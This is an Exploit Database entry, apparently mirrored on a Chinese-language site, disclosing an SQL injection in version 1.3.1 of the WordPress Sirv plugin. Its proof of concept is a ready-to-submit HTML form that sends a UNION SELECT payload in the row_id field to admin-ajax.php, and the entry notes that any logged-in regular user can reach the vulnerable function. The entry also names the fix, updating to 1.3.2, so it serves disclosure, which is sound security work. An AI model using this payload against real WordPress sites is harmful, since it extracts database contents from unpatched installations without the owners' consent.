WordPress Plugin Sirv 1.3.1 – SQL Injection

• Exploit Database
• 14 阅读

• 作者： Lenon Leite
  日期： 2016-11-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40772/

• # Exploit Title: Sirv 1.3.1 Plugin For WordPress Sql Injection
  # Date: 10/11/2016
  # Exploit Author: Lenon Leite
  # Vendor Homepage: https://wordpress.org/plugins/sirv/
  # Software Link: https://wordpress.org/plugins/sirv/
  # Contact: http://twitter.com/lenonleite
  # Website: http://lenonleite.com.br/
  # Category: webapps
  # Version: 1.3.1
  # Tested on: Windows 8.1
  
  
  1 - Description
  
  $_POST[ ‘id’ ] is not escaped. sirv_get_row_by_id() is accessible for every
  registered user.
  
  http://lenonleite.com.br/en/blog/2016/11/10/sirv-1-3-1-plugin-for-wordpress/
  
  2. Proof of Concept
  
  Login as regular user.
  
  <form method="post" action="http://target/wp-admin/admin-ajax.php">
  <input type="text" name="row_id" value="0 UNION SELECT 1, name,slug, term_group, 6, 7, 8, 9, 10, 11, 12 FROM wp_terms WHERE term_id=1">
  <input type="text" name="action" value="sirv_get_row_by_id">
  <input type="submit" value="Send">
  </form>
  
   3. Solution:
  
  Update to version 1.3.2
  
  -- 
  Atenciosamente
  
  Lenon Leite